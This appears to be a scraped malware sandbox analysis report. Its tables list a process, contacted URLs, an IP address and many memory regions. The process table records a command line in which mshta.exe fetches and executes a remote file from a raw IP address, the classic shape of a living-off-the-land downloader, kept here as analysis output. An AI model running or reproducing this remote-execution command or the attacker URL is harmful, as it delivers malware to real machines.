Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\mshta.exe
|
"C:\Windows\System32\mshta.exe" http://194.180.191.34/pr/relationship.tmp /f
|
 |
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://194.180.191.34/pr/relationship.tmp
|
194.180.191.34
|
|
|
|
http://194.180.191.34/pr/relationship.tmp1
|
unknown
|
||
|
http://194.180.191.34/pr/relationship.tmpq
|
unknown
|
||
|
http://194.180.191.34/pr/relationship.tmpndowsINetCookies
|
unknown
|
||
|
http://194.180.191.34/pr/relationship.tmp%
|
unknown
|
||
|
http://194.180.191.34/pr/relationship.tmpE
|
unknown
|
||
|
http://194.180.191.34/pr/relationship.tmp/fternet
|
unknown
|
||
|
http://194.180.191.34/pr/relationship.tmpy
|
unknown
|
||
|
http://194.180.191.34/pr/relationship.tmpvJ
|
unknown
|
||
|
http://194.180.191.34/pr/relationship.tmp...
|
unknown
|
||
|
http://194.180.191.34/pr/relationship.tmpC:
|
unknown
|
There are 1 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
194.180.191.34
|
unknown
|
unknown
|
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
13F5117F000
|
heap
|
page read and write
|
||
|
13F55906000
|
heap
|
page read and write
|
||
|
9360FB000
|
stack
|
page read and write
|
||
|
13F50614000
|
trusted library allocation
|
page read and write
|
||
|
13750020000
|
heap
|
page read and write
|
||
|
13F51174000
|
heap
|
page read and write
|
||
|
13F51171000
|
heap
|
page read and write
|
||
|
13F50630000
|
trusted library allocation
|
page read and write
|
||
|
13F51175000
|
heap
|
page read and write
|
||
|
13F55B03000
|
trusted library allocation
|
page read and write
|
||
|
13F51260000
|
heap
|
page read and write
|
||
|
13750039000
|
heap
|
page read and write
|
||
|
13F50600000
|
trusted library allocation
|
page read and write
|
||
|
1375003E000
|
heap
|
page read and write
|
||
|
13750042000
|
heap
|
page read and write
|
||
|
13F51125000
|
heap
|
page read and write
|
||
|
1374E875000
|
heap
|
page read and write
|
||
|
13F51171000
|
heap
|
page read and write
|
||
|
1374E800000
|
trusted library allocation
|
page read and write
|
||
|
13F512C1000
|
heap
|
page read and write
|
||
|
1374E6D4000
|
trusted library allocation
|
page read and write
|
||
|
13F505B0000
|
trusted library allocation
|
page read and write
|
||
|
13F505F0000
|
trusted library allocation
|
page read and write
|
||
|
1374E590000
|
heap
|
page read and write
|
||
|
935CFF000
|
stack
|
page read and write
|
||
|
13F51275000
|
heap
|
page read and write
|
||
|
9358FB000
|
stack
|
page read and write
|
||
|
13F50630000
|
trusted library allocation
|
page read and write
|
||
|
13F51110000
|
heap
|
page read and write
|
||
|
13F50714000
|
heap
|
page read and write
|
||
|
13F5133B000
|
heap
|
page read and write
|
||
|
13F558E0000
|
trusted library allocation
|
page read and write
|
||
|
13F50630000
|
trusted library allocation
|
page read and write
|
||
|
13F505C4000
|
trusted library allocation
|
page read and write
|
||
|
13F505C9000
|
trusted library allocation
|
page read and write
|
||
|
1374E7B1000
|
heap
|
page read and write
|
||
|
13F50590000
|
trusted library allocation
|
page read and write
|
||
|
1374E768000
|
heap
|
page read and write
|
||
|
9359FE000
|
stack
|
page read and write
|
||
|
13F51169000
|
heap
|
page read and write
|
||
|
13F51297000
|
heap
|
page read and write
|
||
|
13F50578000
|
trusted library allocation
|
page read and write
|
||
|
1374E87E000
|
heap
|
page read and write
|
||
|
935DFE000
|
stack
|
page read and write
|
||
|
13F5118B000
|
heap
|
page read and write
|
||
|
13F50608000
|
trusted library allocation
|
page read and write
|
||
|
1374E716000
|
heap
|
page read and write
|
||
|
13F5128A000
|
heap
|
page read and write
|
||
|
13F51171000
|
heap
|
page read and write
|
||
|
935BFE000
|
stack
|
page read and write
|
||
|
1374E7F0000
|
trusted library allocation
|
page read and write
|
||
|
7DF4FA281000
|
trusted library allocation
|
page execute read
|
||
|
13750024000
|
heap
|
page read and write
|
||
|
13F51171000
|
heap
|
page read and write
|
||
|
13F505E8000
|
trusted library allocation
|
page read and write
|
||
|
13F512B1000
|
heap
|
page read and write
|
||
|
13750046000
|
heap
|
page read and write
|
||
|
935FFE000
|
stack
|
page read and write
|
||
|
1374E870000
|
heap
|
page read and write
|
||
|
13F558E0000
|
trusted library allocation
|
page read and write
|
||
|
13F50610000
|
trusted library allocation
|
page read and write
|
||
|
13F51272000
|
heap
|
page read and write
|
||
|
13F51284000
|
heap
|
page read and write
|
||
|
935326000
|
stack
|
page read and write
|
||
|
13F512AB000
|
heap
|
page read and write
|
||
|
1374E753000
|
heap
|
page read and write
|
||
|
13F54D72000
|
trusted library allocation
|
page read and write
|
||
|
1374E6FE000
|
heap
|
page read and write
|
||
|
13F51169000
|
heap
|
page read and write
|
||
|
1374E830000
|
heap
|
page read and write
|
||
|
13F558F0000
|
heap
|
page readonly
|
||
|
1374E670000
|
heap
|
page read and write
|
||
|
1374E7CD000
|
heap
|
page read and write
|
||
|
13F51264000
|
heap
|
page read and write
|
||
|
13F55680000
|
heap
|
page read and write
|
||
|
13F53390000
|
trusted library section
|
page readonly
|
||
|
1374E79C000
|
heap
|
page read and write
|
||
|
1374E6F8000
|
heap
|
page read and write
|
||
|
13F55957000
|
heap
|
page read and write
|
||
|
13F51175000
|
heap
|
page read and write
|
||
|
13F51336000
|
heap
|
page read and write
|
||
|
7DF4FA291000
|
trusted library allocation
|
page execute read
|
||
|
13F50910000
|
trusted library allocation
|
page read and write
|
||
|
13F50588000
|
trusted library allocation
|
page read and write
|
||
|
13F505E0000
|
trusted library allocation
|
page read and write
|
||
|
13F5060C000
|
trusted library allocation
|
page read and write
|
||
|
1374E690000
|
heap
|
page read and write
|
||
|
13F50618000
|
trusted library allocation
|
page read and write
|
||
|
1374E7B6000
|
heap
|
page read and write
|
||
|
13750170000
|
heap
|
page read and write
|
||
|
13F5118A000
|
heap
|
page read and write
|
||
|
13F50620000
|
trusted library allocation
|
page read and write
|
||
|
13F50624000
|
trusted library allocation
|
page read and write
|
||
|
13F5127D000
|
heap
|
page read and write
|
||
|
1374E7D0000
|
heap
|
page read and write
|
||
|
13F51288000
|
heap
|
page read and write
|
||
|
1374E6F0000
|
heap
|
page read and write
|
||
|
13F50624000
|
trusted library allocation
|
page read and write
|
||
|
13F505FC000
|
trusted library allocation
|
page read and write
|
||
|
1374E7AA000
|
heap
|
page read and write
|
||
|
13F51282000
|
heap
|
page read and write
|
||
|
13F50560000
|
heap
|
page read and write
|
||
|
7DF4FA280000
|
trusted library allocation
|
page readonly
|
||
|
935EFE000
|
stack
|
page read and write
|
||
|
13F51169000
|
heap
|
page read and write
|
||
|
13F51268000
|
heap
|
page read and write
|
||
|
13F5116A000
|
heap
|
page read and write
|
||
|
13F55954000
|
heap
|
page read and write
|
||
|
13F512BD000
|
heap
|
page read and write
|
||
|
13F505D0000
|
trusted library allocation
|
page read and write
|
||
|
13F50710000
|
heap
|
page read and write
|
||
|
13F55B00000
|
trusted library allocation
|
page read and write
|
||
|
13750174000
|
heap
|
page read and write
|
||
|
13F51286000
|
heap
|
page read and write
|
||
|
13F50620000
|
trusted library allocation
|
page read and write
|
||
|
13F505F8000
|
trusted library allocation
|
page read and write
|
||
|
13F5115F000
|
heap
|
page read and write
|
||
|
13F51145000
|
heap
|
page read and write
|
||
|
93537F000
|
stack
|
page read and write
|
||
|
1374E7DB000
|
heap
|
page read and write
|
||
|
13F55900000
|
heap
|
page read and write
|
||
|
13F51158000
|
heap
|
page read and write
|
||
|
13F55B10000
|
trusted library allocation
|
page read and write
|
||
|
13F505D8000
|
trusted library allocation
|
page read and write
|
||
|
1375017D000
|
heap
|
page read and write
|
||
|
13F55920000
|
heap
|
page read and write
|
||
|
13F51175000
|
heap
|
page read and write
|
There are 117 hidden memdumps, click here to show them.